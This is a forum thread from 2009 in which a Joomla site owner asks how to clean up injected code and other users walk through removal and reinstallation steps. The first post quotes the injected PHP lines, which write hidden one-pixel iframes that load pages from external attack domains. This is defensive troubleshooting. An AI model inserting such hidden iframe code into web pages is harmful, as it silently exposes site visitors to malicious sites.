Sites Hacked – Easy Fix?

Forums    Public Forums    General Questions    Sites Hacked - Easy Fix?
Viewing 15 posts - 1 through 15 (of 19 total)
1 2
  • Author
    Posts
  • GeoVi Friend
    May 10, 2009 at 12:32 am #141037

    Hello,

    I’m really bothered by having to search each module, component and administration files default.php for the following bug:

    echo “<iframe src=”http://vafuiek.com/?click=81F01A” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;

    echo “<iframe src=”http://clifedo.net/?click=51891D” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;

    It seems to be everywhere. Is there an easy fix? It’s in my backups, too, no doubt. Do I crash the sties and start over building them? I’m using J1.5.10 on both sites that were hacked. I’ve changed passwords in FTP and My SQL and admin site info but I’m still finding this rubbish the deeper I search. Is there another way?

    I’d appreciate your help very much. Thanks!

    Miffed and wornout,
    GeoVi –

    but still grateful, the sites are still up and running but I’m getting weird error messages, make a check and sure enough that rubbish is the culprit.

    PLEASE HELP!!:((

    1 user says Thank You to GeoVi for this useful post

    1. ecoxport
    Arvind Chauhan Moderator
    May 10, 2009 at 5:42 am #304175

    Hi GeoVi,

    Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.

    Here is what you can try to remove the code from your pages :

    1. Download your complete site backup on your computer. Unzip into a folder.
    2. Downoad Windows Grep from here http://www.wingrep.com and install it.
    3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.

    4. If your input is correct it will display the list of files containing the above code.
    5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.

    Hope that helps

    Regards

    arvind

    1 user says Thank You to Arvind Chauhan for this useful post

    1. GeoVi
    nguyenhuu quang Friend
    May 10, 2009 at 9:19 am #304189

    hi, Your site no hacked.
    It is malware , i think from your PC, I have fixed alot of site with this malware or virus.
    all Index.php. index.html , defaul.php
    add: your iframe and / OR <javascript>hjfhsh fsdhfkj</javascript>
    flow me:
    1. clean your PC fisrt.
    2. download fresh lastest joomla version.
    3. download lastest your 3rd extensions
    4. On your host creat new DIr: example: Yoursite.com/new
    5, Upload and install new Joomla with all extensions (same Old verson at root)
    6. edit Your configuraion.php to Your Old database.
    7. Move all Images (omly images files, not Index.html) from Root to New Dir.
    That’S all

    3 users say Thank You to nguyenhuu quang for this useful post

    1. GeoVi
    2. cursosdesign
    3. ecoxport
    GeoVi Friend
    May 10, 2009 at 11:26 pm #304254

    <em>@drarvindc 128040 wrote:</em><blockquote>Hi GeoVi,

    Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.

    Here is what you can try to remove the code from your pages :

    1. Download your complete site backup on your computer. Unzip into a folder.
    2. Downoad Windows Grep from here http://www.wingrep.com and install it.
    3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.

    4. If your input is correct it will display the list of files containing the above code.
    5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.

    Hope that helps

    Regards

    arvind</blockquote>

    Hi arvind,

    Thank you very much for responding and showing you care. I will attempt this and pray that it works. I may come back to get verification of a step. I’m a novice at this.

    Kindest regards,
    GeoVi

    GeoVi Friend
    May 10, 2009 at 11:33 pm #304255

    <em>@quang268 128057 wrote:</em><blockquote>hi, Your site no hacked.
    It is malware , i think from your PC, I have fixed alot of site with this malware or virus.
    all Index.php. index.html , defaul.php
    add: your iframe and / OR <javascript>hjfhsh fsdhfkj</javascript>
    flow me:
    1. clean your PC fisrt.
    2. download fresh lastest joomla version.
    3. download lastest your 3rd extensions
    4. On your host creat new DIr: example: Yoursite.com/new
    5, Upload and install new Joomla with all extensions (same Old verson at root)
    6. edit Your configuraion.php to Your Old database.
    7. Move all Images (omly images files, not Index.html) from Root to New Dir.
    That’S all</blockquote>

    Quang,

    Thanks again for replying to one of my threads. You said before it wasn’t a hack but malware. I believe I know the difference. I will try what arvind suggested in the first post – first. Then I’ll do what you’ve suggested. I hope something works.

    Kind regards,
    GeoVi

    PS I am not sure how to do step 6 and may have to ask at a later time. Also in step 5, when you say upload and install new Joomla with all extensions, am I uploading OVER the old version? Do I just “overwrite all” when asked?

    Now that I understand this, I may do this first..What I do not understand is Norton Antivirus doesn’t show a bug/virus.

    GeoVi Friend
    May 11, 2009 at 9:07 pm #304376

    <em>@drarvindc 128040 wrote:</em><blockquote>Hi GeoVi,

    Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.

    Here is what you can try to remove the code from your pages :

    1. Download your complete site backup on your computer. Unzip into a folder.
    2. Downoad Windows Grep from here http://www.wingrep.com and install it.
    3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.

    4. If your input is correct it will display the list of files containing the above code.
    5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.

    Hope that helps

    Regards

    arvind</blockquote>

    Hi arvind,

    I downloaded/installed Windows Grep. It does not recognize this extension. I don’t know what to do. I do not understand Step 3. Can you provide more clarification, please?

    Thank you,
    GeoVi

    nguyenhuu quang Friend
    May 12, 2009 at 12:43 am #304391

    I think My Ways is Best. I have fixed alots of site with same problem.

    2 users say Thank You to nguyenhuu quang for this useful post

    1. GeoVi
    2. cursosdesign
    GeoVi Friend
    May 12, 2009 at 12:51 am #304392

    <em>@quang268 128311 wrote:</em><blockquote>I think My Ways is Best. I have fixed alots of site with same problem.</blockquote>

    Okay, I’ll try your way first.

    I’ve run Norton and it shows nothing. You said to clean my pc first. Since Norton shows nothing, am I to assume then my PC is clean and proceed? I have 3 sites that are infected! I am so annoyed by this.

    Thanks.

    GeoVi Friend
    May 24, 2009 at 12:42 am #305687

    <em>@quang268 128057 wrote:</em><blockquote>hi, Your site no hacked.
    It is malware , i think from your PC, I have fixed alot of site with this malware or virus.
    all Index.php. index.html , defaul.php
    add: your iframe and / OR <javascript>hjfhsh fsdhfkj</javascript>
    flow me:
    1. clean your PC fisrt.
    2. download fresh lastest joomla version.
    3. download lastest your 3rd extensions
    4. On your host creat new DIr: example: Yoursite.com/new
    5, Upload and install new Joomla with all extensions (same Old verson at root)
    6. edit Your configuraion.php to Your Old database.
    7. Move all Images (omly images files, not Index.html) from Root to New Dir.
    That’S all</blockquote>

    Quang,

    What a beautiful baby!!! *warm smile*

    I have been busy. I am forced to take care of site now because Google and FireFox says it is dangerous for site visitors with a bad message when going to it.

    I have done these things:
    1. 2. 3. 4. 5. 7.

    Now I am unsure about #6. I have questions, please. I do not know what I am doing but trying to understand so please be patient.

    1. Will I have to retype the content articles etc. to the new site or is there a way to transfer them to the new site.
    2. When you say edit configuration.php to my old database, what do you mean?
    3. Will I delete the iinfected site in the root and move the new site from the subdirectory to the new site when everything is done?

    Thank you for your help. I believe this is the best answer.

    Kindest regards,
    GeoVi

    nguyenhuu quang Friend
    May 24, 2009 at 12:51 am #305688

    ok. if you move new site to root. so upload again configuration.php. no problem.
    because:
    example:

    var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\tmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9\logs';
    if you on new dir like that:
    var
    $tmp_path = 'C:\AppServ\www\Joomla_1.5.9newtmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9newlogs';
    so when you move to root, need to edit it
    Thanks

    1 user says Thank You to nguyenhuu quang for this useful post

    1. GeoVi
    GeoVi Friend
    May 24, 2009 at 1:31 am #305701

    <em>@quang268 129949 wrote:</em><blockquote>ok. if you move new site to root. so upload again configuration.php. no problem.
    because:
    example:

    var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\tmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9\logs';

    if you on new dir like that:
    var
    $tmp_path = 'C:\AppServ\www\Joomla_1.5.9newtmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9newlogs';

    so when you move to root, need to edit it
    Thanks</blockquote>

    Thank you very much for quick reply but I do not fully understand.

    How do I move articles and content from old site to new site? Do I copy and paste them? Am I rebuilding the site? If I must, I will but if there is a way to avoid it, I would like to know, please.

    nguyenhuu quang Friend
    May 24, 2009 at 1:51 am #305702

    open your configuration.php and you can see like that

    var $dbtype = 'mysql';
    var $host = 'localhost';
    var $user = 'root';
    var $password = 'thanhlam';
    var $db = 'joomla159';
    var $dbprefix = 'jos_';
    and change it to Old database
    or, if you still to keep old configuration.php.
    pls rename new configuration.php and upload old configuration.php to your host

    1 user says Thank You to nguyenhuu quang for this useful post

    1. GeoVi
    GeoVi Friend
    May 24, 2009 at 2:42 am #305705

    <em>@quang268 129963 wrote:</em><blockquote>open your configuration.php and you can see like that

    var $dbtype = 'mysql';
    var $host = 'localhost';
    var $user = 'root';
    var $password = 'thanhlam';
    var $db = 'joomla159';
    var $dbprefix = 'jos_';

    and change it to Old database
    or, if you still to keep old configuration.php.
    pls rename new configuration.php and upload old configuration.php to your host</blockquote>

    I think I got it now! Thank you!! You have been very patient with me and I am forever grateful. *gracefully bowing*

    Big smile! 😀

    GeoVi

    nguyenhuu quang Friend
    May 24, 2009 at 2:45 am #305706

    n problem Goevi, sory for my bad english so sometime not clear.
    Thanks
    do you have skype or YM other chat software pls contact me’

    1 user says Thank You to nguyenhuu quang for this useful post

    1. GeoVi
    GeoVi Friend
    May 24, 2009 at 3:08 am #305711

    <em>@quang268 129967 wrote:</em><blockquote>n problem Goevi, sory for my bad english so sometime not clear.
    Thanks
    do you have skype or YM other chat software pls contact me'</blockquote>

    Quang, it is not your English. It is me not understanding how MySQL works and other tech issues. I just want to have a site that works but there is more involved. Your English is better than my Vietnamese. :laugh: You do very well with English.

    I am trying to reach you on Skype now. 🙂

  • Author
    Posts
Viewing 15 posts - 1 through 15 (of 19 total)
1 2

This topic contains 19 replies, has 5 voices, and was last updated by  nguyenhuu quang 15 years, 5 months ago.

We moved to new unified forum. Please post all new support queries in our New Forum

Important Notice :

New Unified Portal is live

Must Read

Jump to forum

Categories